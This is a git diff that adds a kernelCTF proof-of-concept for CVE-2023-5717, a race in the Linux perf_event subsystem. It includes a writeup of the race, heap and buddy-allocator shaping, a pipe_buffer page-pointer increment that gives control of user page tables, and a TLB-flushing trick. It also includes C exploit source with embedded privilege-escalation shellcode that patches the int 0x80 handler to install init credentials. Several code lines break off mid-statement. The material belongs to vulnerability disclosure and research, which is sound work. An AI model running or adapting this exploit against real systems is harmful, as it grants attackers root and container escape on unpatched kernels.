diff --git a/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/exploit.md b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/exploit.md
new file mode 100644
index 00000000..327912f0
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/exploit.md
@@ -0,0 +1,248 @@
+# CVE-2023-5717
+
+## Exploit Details
+
+Exploit demo for CVE-2023-5717. Flag: `kernelCTF{v1:mitigation-v3b-6.1.55:1732857935:6261f8f865bfa74724bdfdf5002d01c644f70ff6}`
+
+## Overview
+
+This vulnerability enables an out-of-bounds increment when a race condition is successfully triggered.
+On hardened systems, mitigations such as CONFIG_KMALLOC_SPLIT_VARSIZE increase exploitation complexity.
+To circumvent these defenses, we manipulated the buddy allocator to achieve controlled linear heap allocation.
+
+The diagram below represents the hierarchy of perf_event groups when a process creates an event group and then forks a child process.
+1) Parent group (Initial state)
+- At the top, we have a group_leader, which is the leader of the parent event group.
+- The group_leader manages multiple sibling events, which are linked together.
+```
++-----------------+         +------------+
+|  group_leader   |---------| sibling 1  |   <--- Siblings connected to group_leader
++-----------------+         +------------+
+```
+2) Child group (After forking)
+- When the process forks a child process, the event group is inherited by the child.
+- This creates a child event group, which consists of new events mirroring the parent group's structure.
+- The child event group also has a new group leader, which is the event corresponding to group_leader in the child process.
+```
++-----------------+         +------------+
+|  group_leader   |---------| sibling 1  |   <--- Siblings connected to group_leader
++-----------------+         +------------+
+        |                         |
++-----------+             +-----------+
+|  child 1  |-------------|  child 2  |   <--- Children connected to each parent & child group leader
++-----------+             +-----------+
+```
+
+## Race scenario
+### CPU0
+```c
+perf_read()
+  ctx = perf_event_ctx_lock(event);
+  - perf_read_group()
+      values = kzalloc(event->read_size, GFP_KERNEL); // [A]
+      mutex_lock(&leader->child_mutex); // [B]
+      ret = __perf_read_group_add(leader, read_format, values);
+      list_for_each_entry(child, &leader->child_list, child_list) {
+          ret = __perf_read_group_add(child, read_format, values);
+      }
+      mutex_unlock(&leader->child_mutex);
+  perf_event_ctx_unlock(event, ctx);
+```
+### CPU1
+```c
+perf_release()
+  ctx = perf_event_ctx_lock(event);
+  perf_remove_from_context(event, DETACH_GROUP|DETACH_DEAD); // [C]
+  perf_event_ctx_unlock(event, ctx); // [D]
+  mutex_lock(&event->child_mutex); // [E]
+  list_for_each_entry(child, &event->child_list, child_list) {
+      perf_remove_from_context(child, DETACH_GROUP);
+  }
+```
+### Description
+If execution follows the sequence C -> D -> A -> B -> E, the vulnerability is triggered as follows:
+1) At C, the parent event is removed from its parent group, decrementing `group_leader->nr_siblings`, which represents the parent group's size.
+2) At A, `values` is allocated based on the value of `group_leader->nr_siblings`, which has now been reduced.
+3) At B, CPU 0 locks child_mutex, preventing CPU 1 from proceeding beyond E.
+4) At E, CPU 1 attempts to iterate through `event->child_list`, but it is blocked because CPU 0 holds the lock taken at B.
+5) Because `values` was sized from the parent group, which now has fewer siblings than the still-intact child groups, the `__perf_read_group_add()` calls for the children write past the end of the allocation, resulting in a heap out-of-bounds increment.
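+
+To make the window above concrete, the racing pair of system calls boils down to a `read()` of the group leader on one CPU against a `close()` of the parent event on another. The sketch below is illustrative only: the fds, CPU numbers and timing are assumptions, and the real orchestration, heap shaping and timing logic live in `exploit.c`.
+```c
+#define _GNU_SOURCE
+#include <sched.h>
+#include <stdint.h>
+#include <unistd.h>
+
+static void pin(int cpu)                  /* pin the calling task to one CPU */
+{
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(cpu, &set);
+    sched_setaffinity(0, sizeof(set), &set);
+}
+
+/* leader_fd: perf fd of the group leader (already inherited by forked children)
+ * victim_fd: perf fd of the parent event whose release we race against */
+static void race_once(int leader_fd, int victim_fd)
+{
+    uint64_t values[0x1000];
+
+    if (fork() == 0) {                    /* CPU0: perf_read() -> perf_read_group() */
+        pin(0);
+        read(leader_fd, values, sizeof(values));  /* [A]+[B] and the child walk */
+        _exit(0);
+    }
+    pin(1);                               /* CPU1: perf_release() via close() */
+    close(victim_fd);                     /* [C]: DETACH_GROUP shrinks nr_siblings */
+}
+```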
+ +## Allocating Buffers via the Buddy Allocator +In `perf_read_group()`, the allocated buffer size is determined by the number of active events. +Here is a reliable way to inject new events into an existing group from another process. +The `perf_event_open()` system call enforces a restriction that new events must belong to the same task as the group leader: +```c +SYSCALL_DEFINE5(perf_event_open, + struct perf_event_attr __user *, attr_uptr, + pid_t, pid, int, cpu, int, group_fd, unsigned long, flags) +{ + [...] + if (pid != -1 && !(flags & PERF_FLAG_PID_CGROUP)) { + task = find_lively_task_by_vpid(pid); + if (IS_ERR(task)) { + err = PTR_ERR(task); + goto err_group_fd; + } + } + [...] + event = perf_event_alloc(&attr, cpu, task, group_leader, NULL, + NULL, NULL, cgroup_fd); + [...] + ctx = find_get_context(pmu, task, event); + if (IS_ERR(ctx)) { + err = PTR_ERR(ctx); + goto err_alloc; + } + + /* + * Look up the group leader (we will attach this event to it): + */ + if (group_leader) { + [...] + /* + * Make sure we're both on the same task, or both + * per-CPU events. + */ + if (group_leader->ctx->task != ctx->task) + goto err_context; + [...] + } + [...] +} +``` +The check: +```c +if (group_leader->ctx->task != ctx->task) + goto err_context +``` +ensures that group_leader and the new event belong to the same task. + +The function `perf_event_context_sched_out()` is invoked by the task scheduler during context switches: +```c +static void perf_event_context_sched_out(struct task_struct *task, int ctxn, + struct task_struct *next) +{ + [...] + if (context_equiv(ctx, next_ctx)) { + [...] + WRITE_ONCE(ctx->task, next); + WRITE_ONCE(next_ctx->task, task); + [...] + RCU_INIT_POINTER(task->perf_event_ctxp[ctxn], next_ctx); + RCU_INIT_POINTER(next->perf_event_ctxp[ctxn], ctx); + + do_switch = 0; + + perf_event_sync_stat(ctx, next_ctx); + } + [...] +} +``` +This function swaps ctx between two tasks under the following conditions: + +``` +child task -> parent task (same event group) +parent task -> child task (same event group) +child task -> child task (same event group) +``` + +When we pin a child task to CPU0 and a parent task to CPU1, the ctx will no longer be swapped due to the absence of context switching between the two tasks. + +Initially, we create a child process that allocates 512 events. +Due to `perf_event_context_sched_out()`, the child's ctx is likely to be swapped with the parent's ctx during context switching, making the child inherit the parent's ctx. + +```c +pid = add_siblings_fork(group_leader, 512, 0); +if (pid == 0) { + ret = 1; + goto gg; +} + +pid = add_siblings_fork(group_leader, 511, pid); // first child has the ownership +if (pid == 0) { // context switching failure? + ret = 1; + goto gg; +} +``` +To satisfy the condition `group_leader->ctx->task == ctx->task`, we pass pid 0 (current child process) to `add_siblings_fork()`. +Since the current child process' ctx was swapped with the parent's ctx and `group_leader->ctx` still belongs to the parent, the check is bypassed. +Because the first child process now holds the parent's ctx, we must pass its pid when calling `add_siblings_fork()` again. + +## Arbitrary increment +- Normally, a page fault increments a counter in the current process's ctx. +- However, after swapping(`perf_event_context_sched_out()`), the child's page fault increments counters in the parent's ctx. +- Pinning the parent and child to different CPUs prevents context reswaps, making the attack reliable. 
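+
+For reference, the non-racy behaviour that this increment primitive abuses looks as follows: a `PERF_COUNT_SW_PAGE_FAULTS` software event opened on the current task is bumped once per fault and read back with `read()`. This is a minimal self-contained sketch, not taken from the exploit; the exploit's racing version of the same loop is shown below.
+```c
+#define _GNU_SOURCE
+#include <linux/perf_event.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <unistd.h>
+
+int main(void)
+{
+    struct perf_event_attr attr;
+    uint64_t count;
+
+    memset(&attr, 0, sizeof(attr));
+    attr.type = PERF_TYPE_SOFTWARE;
+    attr.size = sizeof(attr);
+    attr.config = PERF_COUNT_SW_PAGE_FAULTS;  /* increments on every user page fault */
+    attr.exclude_kernel = 1;
+    attr.exclude_hv = 1;
+
+    int fd = syscall(SYS_perf_event_open, &attr, 0, -1, -1, 0); /* this task, any CPU */
+    char *p = mmap(NULL, 0x80 * 0x1000, PROT_READ | PROT_WRITE,
+                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+    for (int i = 0; i < 0x80; i++)
+        p[0x1000 * i] = 0x41;                 /* each first touch faults once */
+    read(fd, &count, sizeof(count));
+    printf("page faults counted: %lu\n", (unsigned long)count);
+    return 0;
+}
+```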
+
+```c
+    pid_t child_pid = fork();
+    if (child_pid == 0) { // child read, pinned to CPU_A
+        [...]
+        char *addr = (char *)mmap(NULL, 0x1000 * 0x80, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+        for (int i=0; i<0x80; i++){
+            ioctl(group_leader, PERF_EVENT_IOC_ENABLE, 0);
+            addr[0x1000 * i] = 0x41; // trigger page faults
+            ioctl(group_leader, PERF_EVENT_IOC_DISABLE, 0);
+        }
+        [...]
+        remove_xattr("security.x12296_10", 1); // will be used for oob write
+        for (int _=0; _<32; _++) {
+            read(group_leader, buf, sizeof(buf));
+        }
+        remove_xattr("security.ssiphim", 1);
+        if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) { // reclaim the buffer
+            perror("reclaim failed");
+            exit(EXIT_FAILURE);
+        }
+        [...]
+    }
+    else if (child_pid > 0) {
+        _pin_to_cpu(CPU_B); // pinned to CPU_B
+        sched_yield();
+        [...]
+    }
+```
+
+## Arbitrary physical address Read/Write
+To extend the race window, we adapted code from the [kernelCTF CVE-2023-4622 writeup](https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-4622_lts/docs/exploit.md).
+
+1) Spraying User PTEs Near pipe_buffer
+- First, we allocate a pipe_buffer and then allocate user pages.
+- By repeatedly accessing these user pages, we spray user page table entries (PTEs) close to the pipe_buffer in memory.
+
+2) Triggering the Vulnerability to Increment `pipe_buffer->page`
+- We trigger the vulnerability to increment `pipe_buffer->page`, effectively making it point to the user PTEs.
+- If the race condition is successful, we gain control over the user PTEs and can modify them as needed.
+
+3) Patching the int 0x80 Handler
+- Once we gain arbitrary memory read/write, we search for the int 0x80 handler and overwrite it with our shellcode.
+```asm
+    swapgs
+    mov r12, QWORD PTR gs:0x20cc0
+    mov r14, [r12+0x248]
+    sub r14, 0x1ec030 // r14 = kbase
+    mov r8, r14
+
+    mov rdi, 1
+    mov rax, r8
+    add rax, 0x1bde50
+
+    push r12
+    push r8
+    call rax // find_task_by_vpid(1)
+    mov rbx, rax
+    pop r8
+    pop r12
+
+    mov rax, r8
+    add rax, 0x2a76900
+    mov rdi, rax
+    mov [rbx+2104], rdi // task_struct->ns_proxy = init_nsproxy
+    mov [r12+2104], rdi // task_struct->ns_proxy = init_nsproxy
+
+    mov rax, r8
+    add rax, 0x2a76b40
+    mov rdi, rax
+    mov [r12 + 2008], rdi // task_struct->cred = init_cred
+    swapgs
+    iretq
+```
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/novel-techniques.md b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/novel-techniques.md
new file mode 100644
index 00000000..baaf3087
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2023-5717_mitigation/docs/novel-techniques.md
@@ -0,0 +1,39 @@
+# Fast, Deterministic TLB Flushing for User PTE Exploits via mprotect()
+This technique provides a way to forcibly flush the Translation Lookaside Buffer (TLB) when user PTEs are modified to read or write arbitrary physical addresses. Typically, one might allocate a large chunk of memory to provoke a TLB flush, but in low-memory conditions, where the OOM (Out-Of-Memory) killer might be triggered, this approach becomes infeasible. Our solution is to rapidly toggle page permissions with mprotect(), guaranteeing a TLB flush in a fast and consistent manner, even under memory pressure.
+
+- Eliminating Large Memory Allocations
+Instead of allocating huge memory regions to force a TLB flush (risky under OOM conditions), we rely solely on changing existing page permissions. This approach works even in tight memory scenarios where the OOM killer would otherwise prevent new allocations.
+
+- Fast and Consistent TLB Synchronization
+By toggling permissions (e.g., R -> RWX -> R), we trigger quick, targeted TLB invalidations. This ensures immediate visibility of any changes to the physical memory mapped by the user PTE, vastly reducing the time required to search or exploit the memory region.
+
+## Technique Details
+User PTE Modification
+We manipulate user-space page table entries (PTEs) to point to arbitrary physical addresses, gaining direct read or write access to privileged memory content. However, these changes aren't recognized unless the TLB is invalidated.
+
+The permission flip (mprotect(..., PROT_READ | PROT_WRITE | PROT_EXEC) -> PROT_READ -> back to RWX) forces a TLB flush in all typical Linux environments.
+This provides a reliable, universal mechanism to update TLB mappings without depending on unpredictable memory allocation behavior.
+Compatible with Low-Memory Scenarios
+
+```c
+for (int j=0; j<16; j++) {
+    mprotect(&spray_addr[ii][jj], 0x1000, PROT_EXEC | PROT_READ | PROT_WRITE);
+    if (j%8 == 0)
+        printf("data%d : %lx %lx\n", j, *(uint64_t *)(&spray_addr[ii][jj]), *(uint64_t *)(&spray_addr[ii][jj+0x9b0]));
+
+    if (*(uint64_t *)(&spray_addr[ii][jj+0x9b0]) == 0xc089f8010fca010fULL)
+    {
+        for (int x=0; x
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <stdatomic.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <signal.h>
+#include <time.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <sys/wait.h>
+#include <sys/mman.h>
+#include <sys/ioctl.h>
+#include <sys/socket.h>
+#include <sys/epoll.h>
+#include <sys/timerfd.h>
+#include <sys/xattr.h>
+#include <sys/resource.h>
+#include <sys/syscall.h>
+#include <linux/perf_event.h>
+
+#define MIN 60000
+#define MAX 72000
+
+#define SIBLINGS_MAX 1024 // about 0x4000 ~
+#define CPU_A 1 // main cpu
+#define CPU_B 0
+#define MAX_TRY 4096
+#define TRY_PER_ITER 300
+// TOTAL_ITER = MAX_TRY * TRY_PER_ITER
+
+char shellcode[] = "\x0f\x01\xf8\x65\x4c\x8b\x24\x25\xc0\x0c\x02\x00\x4d\x8b\xb4\x24\x48\x02\x00\x00\x49\x81\xee\x30\xc0\x1e\x00\x4d\x89\xf0\x48\xc7\xc7\x01\x00\x00\x00\x4c\x89\xc0\x48\x05\x50\xde\x1b\x00\x41\x54\x41\x50\xff\xd0\x48\x89\xc3\x41\x58\x41\x5c\x4c\x89\xc0\x48\x05\x00\x69\xa7\x02\x48\x89\xc7\x48\x89\xbb\x38\x08\x00\x00\x49\x89\xbc\x24\x38\x08\x00\x00\x4c\x89\xc0\x48\x05\x40\x6b\xa7\x02\x48\x89\xc7\x49\x89\xbc\x24\xd8\x07\x00\x00\x0f\x01\xf8\x48\xcf";
+// change nsproxy to initnsproxy & cred to init cred
+
+int owner_pid;
+
+#define DEBUG_PRINT() printf("[DEBUG] %d:%s : PID=%d, CPU=%d\n", __LINE__, __func__, getpid(), sched_getcpu());
+
+inline static int _pin_to_cpu(int id)
+{
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(id, &set);
+    return sched_setaffinity(getpid(), sizeof(set), &set);
+}
+
+void busy_wait(long us) {
+    struct timespec start, current;
+
+    clock_gettime(CLOCK_MONOTONIC, &start);
+
+    do {
+        clock_gettime(CLOCK_MONOTONIC, &current);
+    } while ((current.tv_sec - start.tv_sec) * 1000000 + (current.tv_nsec - start.tv_nsec) / 1000 < us);
+}
+
+int timefds[0x500000];
+int epfds[0x500000];
+char buf[0x1000];
+int tfd;
+
+static void epoll_ctl_add(int epfd, int fd, uint32_t events)
+{
+    struct epoll_event ev;
+    ev.events = events;
+    ev.data.fd = fd;
+    epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev);
+}
+
+void do_epoll_enqueue(int fd)
+{
+    int cfd[2];
+    socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
+    for (int k = 0; k < 0x10; k++)
+    {
+        if (fork() == 0)
+        {
+            for (int i = 0; i < 0x300; i++)
+            {
+                timefds[i] = dup(fd);
+            }
+            for (int i = 0; i < 0x2c0; i++)
+            {
+                epfds[i] = epoll_create(0x1);
+            }
+            for (int i = 0; i < 0x2c0; i++)
+            {
+                for (int j = 0; j < 0x300; j++)
+                {
+                    // queue as many as possible async waiters at timerfd waitqueue
+                    epoll_ctl_add(epfds[i], timefds[j], 0);
+
} + } + write(cfd[1], buf, 1); + raise(SIGSTOP); // stop here for nothing and just keep epoll alive + } + // sync to make sure it has queue what we need + read(cfd[0], buf, 1); + } + close(cfd[0]); + close(cfd[1]); +} + +void paused(){ + write(1, "paused\n", 7); + char buf[1]; + read(0, buf, 1); +} + +void remove_xattr(char * name, int idx){ + char fname[0x20]; + sprintf(fname, "/tmp/x%d", idx); + if (setxattr(fname, name, NULL, 0, 0) < 0){ + perror("remove_xattr()"); + exit(0); + } +} + +#define PREFIX "security." + +static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, int cpu, int group_fd, unsigned long flags) { + return syscall(SYS_perf_event_open, hw_event, pid, cpu, group_fd, flags); +} + +#define MAP_SIZE (512ULL * 512ULL * 0x1000ULL) +#define ALIGN_2MB (512ULL * 0x1000ULL) +char * spray_addr[2]; +int vuln_pipe[2]; +void bootstrap() { + char * addr; + char buf[0x100] = {0xcc, }; + uint64_t current_brk = (uint64_t)sbrk(0); + uint64_t aligned_addr = (current_brk / ALIGN_2MB) * ALIGN_2MB; + addr = mmap((void *)(aligned_addr + ALIGN_2MB), MAP_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); + mlock(addr, MAP_SIZE); + for (size_t i = 0; i < MAP_SIZE; i += 0x1000 * 512) + addr[i] = 0x41; + for (size_t i = 0; i < MAP_SIZE; i += 0x1000) + addr[i] = 0x41; + spray_addr[0] = addr; + if (pipe(vuln_pipe) < 0) { + perror("pipe"); + return; + } + + write(vuln_pipe[1], buf, sizeof(buf)); + addr = mmap((void *)aligned_addr + ALIGN_2MB + MAP_SIZE, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0); + mlock(addr, MAP_SIZE); + for (size_t i = 0; i < MAP_SIZE; i += 0x1000 * 512) + addr[i] = 0x41; + for (size_t i = 0; i < MAP_SIZE; i += 0x1000) + addr[i] = 0x41; + spray_addr[1] = addr; +} + +void set_max_fd_limit() { + struct rlimit rl; + if (getrlimit(RLIMIT_NOFILE, &rl) == -1) { + perror("getrlimit failed"); + exit(EXIT_FAILURE); + } + rl.rlim_cur = rl.rlim_max; + if (setrlimit(RLIMIT_NOFILE, &rl) == -1) { + perror("setrlimit failed"); + exit(EXIT_FAILURE); + } + printf("[+] changed fd limit: %ld\n", rl.rlim_cur); +} + +#define MAX_FORK_CNT 50 +int siblings_fork_pid[MAX_FORK_CNT]; +int siblings_fork_cnt; +int siblings[SIBLINGS_MAX]; +int siblings_cnt; +static atomic_int race_go = 0; // child process will use it +static atomic_int race_tf = 0; + +void print_buddyinfo(void) { + int cnt=0; + char buf[1024]; + int fd = open("/proc/buddyinfo", O_RDONLY); + int n = read(fd, buf, sizeof(buf)-1); + if(n > 0) { + for (int i=0; ivalue = (char *)calloc(0x10000, 1); + if((ret->size = getxattr(fname, name, ret->value, 0x10000)) < 0) + puts("getxattr error"); + for (int i=0; i<0x10000; i+=0x1000) + ret->value[i] = 0x41; + free(ret->value); + return ret; +} + +void spray_xattr_page(int size, int cnt, int idx){ + char value[0x4000] = {0, }; + char fname[0x20]; + sprintf(fname, "/tmp/x%d", idx); + close(open(fname, O_CREAT | O_RDWR, 0777)); + for(int i = 0; i <= cnt; i++){ + char z[0x24] = {0, }; + sprintf(z,"x%d_%d", size, i); + char *name = (char *)calloc(strlen(PREFIX) + strlen(z) + 1, 1); + memset(value, i%0x100, size); + strcpy(name, PREFIX); + strcat(name, z); + int ret = setxattr(fname, name, value, size, 0); + if (ret < 0){ + perror("setxattr"); + exit(EXIT_FAILURE); + } + } +} + +void resize_pipe(int fd, uint64_t sz){ + if(fcntl(fd, F_SETPIPE_SZ, sz) < 0) + perror("pipe resize"); +} + +void race_gogo(int signo) { // signal handler + atomic_store(&race_go, 1); +} + +void race_notify(int signo) { + atomic_store(&race_tf, 1); +} + 
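+/*
+ * Signal plumbing for the race orchestration: the two handlers above only
+ * flip atomic flags, so they are async-signal-safe. race_gogo() sets
+ * race_go, which the racing child watches for (see the "child process will
+ * use it" note on its declaration), and race_notify() sets race_tf when
+ * SIGUSR1 arrives. race_oracle() below installs race_notify() for SIGUSR1
+ * in the caller; each race() attempt reports completion by sending SIGUSR1
+ * to its parent (see kill(ppid, SIGUSR1) at the end of race()).
+ */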
+void race_oracle(){ + struct sigaction sa; + sa.sa_handler = race_notify; + sigemptyset(&sa.sa_mask); + sa.sa_flags = 0; + if (sigaction(SIGUSR1, &sa, NULL) < 0) { + perror("sigaction"); + exit(EXIT_FAILURE); + } +} + +void print_proc_self_maps_raw() { + int fd = open("/proc/self/maps", O_RDONLY); + if (fd < 0) { + write(STDERR_FILENO, "Error: Unable to open /proc/self/maps\n", 38); + _exit(EXIT_FAILURE); + } + + char buffer[256]; + ssize_t bytes_read; + + while ((bytes_read = read(fd, buffer, sizeof(buffer))) > 0) { + write(STDOUT_FILENO, buffer, bytes_read); + } + + if (bytes_read < 0) { + write(STDERR_FILENO, "Error: Unable to read /proc/self/maps\n", 38); + _exit(EXIT_FAILURE); + } + + close(fd); +} + +int counter_init = 0; +void race(int group_leader) { // caller must have ownership of the group + int pipefd[2]; + uint64_t buf[0x2000] = {0, }; + char buffer[0x100] = {0x41, }; + if (pipe(pipefd) < 0){ + perror("race - pipe"); + exit(EXIT_FAILURE); + } + int ppid = getppid(); + int status; + + pid_t child_pid = fork(); + if (child_pid == 0) { // child read + _pin_to_cpu(CPU_A); + sched_yield(); + // DEBUG_PRINT(); + raise(SIGSTOP); // stop - keep same generation + for (int i=0; i<512+511; i++){ + ioctl(siblings[i], PERF_EVENT_IOC_RESET, PERF_IOC_FLAG_GROUP); + ioctl(siblings[i], PERF_EVENT_IOC_ENABLE, 0); + } + if (close(siblings[100]) < 0) { + perror("close failed"); + exit(EXIT_FAILURE); + } + char * addr; + if (!counter_init) { // preserving previously recorded counters. + puts("[+] Initializing Counters"); + addr = (char *)mmap(NULL, 0x1000 * 0x80, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); + for (int i=0; i<0x80; i++){ + ioctl(group_leader, PERF_EVENT_IOC_ENABLE, 0); + addr[0x1000 * i] = 0x41; + ioctl(group_leader, PERF_EVENT_IOC_DISABLE, 0); + } + } + + write(pipefd[1], buffer, 1); // sync point A + remove_xattr("security.x12296_10", 1); + // x10 reclaimed by CPU_B is now released on CPU_A + for (int _=0; _<32; _++); + read(group_leader, buf, sizeof(buf)); + remove_xattr("security.ssiphim", 1); + if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) { + perror("reclaim failed"); + exit(EXIT_FAILURE); + } + if (setxattr("/tmp/x1", "security.ssiphim", buf, 0x3008, 0) < 0) { + perror("reclaim failed"); + exit(EXIT_FAILURE); + } + uint64_t ptes[512]; + for (int p=0; p<512; p++) + ptes[p] = 0x8000000000000067; + + write(vuln_pipe[1], ptes, sizeof(ptes)); + read(vuln_pipe[0], ptes, sizeof(ptes)); + if (!counter_init) { + munmap(addr, 0x1000 * 0x80); + } + exit(0); + } + else if (child_pid > 0) { // parent + // DEBUG_PRINT(); + struct perf_event_attr pe; + memset(&pe, 0, sizeof(pe)); + pe.type = PERF_TYPE_SOFTWARE; + pe.size = sizeof(pe); + pe.config = PERF_COUNT_SW_PAGE_FAULTS; + pe.disabled = 0; + pe.exclude_kernel = 1; + pe.exclude_hv = 1; + pe.inherit = 1; + pe.pinned = 0; + + int tmp = perf_event_open(&pe, 0, CPU_A, -1, 0); + close(tmp); // generation++ and ctx will be pinned. 
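+        /*
+         * Opening and then closing a throw-away event touches this task's
+         * perf ctx ("generation++"), so context_equiv() in
+         * perf_event_context_sched_out() stops treating it as equivalent to
+         * the peer task's ctx and no further ctx swaps happen; the ctx is
+         * effectively pinned to this task for the rest of the attempt.
+         */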
+ usleep(20000); + kill(child_pid, SIGCONT); // continue + + read(pipefd[0], buffer, 1); // sync point A + int r = MIN + rand() % (MAX - MIN + 1); + printf("[*] r = %d\n", r); + // int r = timer; + struct itimerspec new = {.it_value.tv_nsec = r}; // 95674 + timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL); + close(siblings[100]); + + tmp = perf_event_open(&pe, owner_pid, CPU_A, group_leader, 0); + if (tmp < 0) { + perror("Adding failed"); + exit(1); + } + siblings[100] = tmp; + } else { + perror("fork failed"); + exit(EXIT_FAILURE); + } + // DEBUGDEBUG - not + waitpid(child_pid, &status, 0); + if (!counter_init) + counter_init = 1; + + close(pipefd[0]); + close(pipefd[1]); + atomic_store(&race_go, 0); // \(*_*)/ + kill(ppid, SIGUSR1); +} + +pid_t add_siblings_fork(int group_leader, int cnt, int ctx_pid, int is_racer){ + if (siblings_fork_cnt >= MAX_FORK_CNT){ + puts("[-] nope"); + exit(EXIT_FAILURE); + } + char buffer[1] = {0}; + int pipe_fd[2]; + if (pipe(pipe_fd) < 0) { + perror("add_siblings_fork - pipe"); + exit(EXIT_FAILURE); + } + struct perf_event_attr pe; + memset(&pe, 0, sizeof(pe)); + pe.type = PERF_TYPE_SOFTWARE; + pe.size = sizeof(pe); + pe.config = PERF_COUNT_SW_PAGE_FAULTS; + pe.disabled = 0; + pe.exclude_kernel = 1; + pe.exclude_hv = 1; + pe.inherit = 1; // parent.attr.inherit == child.attr.inherit + pe.pinned = 0; // child can not be pinned - group leader only + + sched_yield(); + pid_t child_pid = fork(); + if(child_pid == 0) { + // child & parent must be on the same cpu (validation event->cpu) + // This child process must have ownership of the group + int tmp = perf_event_open(&pe, 0, CPU_A, -1, 0); + close(tmp); // generation++ and ctx will be pinned. + + owner_pid = getpid(); + printf("owner : %d\n", owner_pid); + + for(int i=0; i 0x80000000e0000000) + break; + for (int p=0; p<512; p++) + ptes[p] = pte; + write(vuln_pipe[1], ptes, sizeof(ptes)); + read(vuln_pipe[0], ptes, sizeof(ptes)); + + for (int j=0; j<1; j++) { + mprotect(&spray_addr[ii][jj], 0x1000, PROT_EXEC | PROT_READ | PROT_WRITE); + if (j%8 == 0) + printf("data%d : %lx %lx\n", j, *(uint64_t *)(&spray_addr[ii][jj]), *(uint64_t *)(&spray_addr[ii][jj+0x9b0])); + + if (*(uint64_t *)(&spray_addr[ii][jj+0x9b0]) == 0xc089f8010fca010fULL) + { + for (int x=0; x 0) { + for (int it=0; it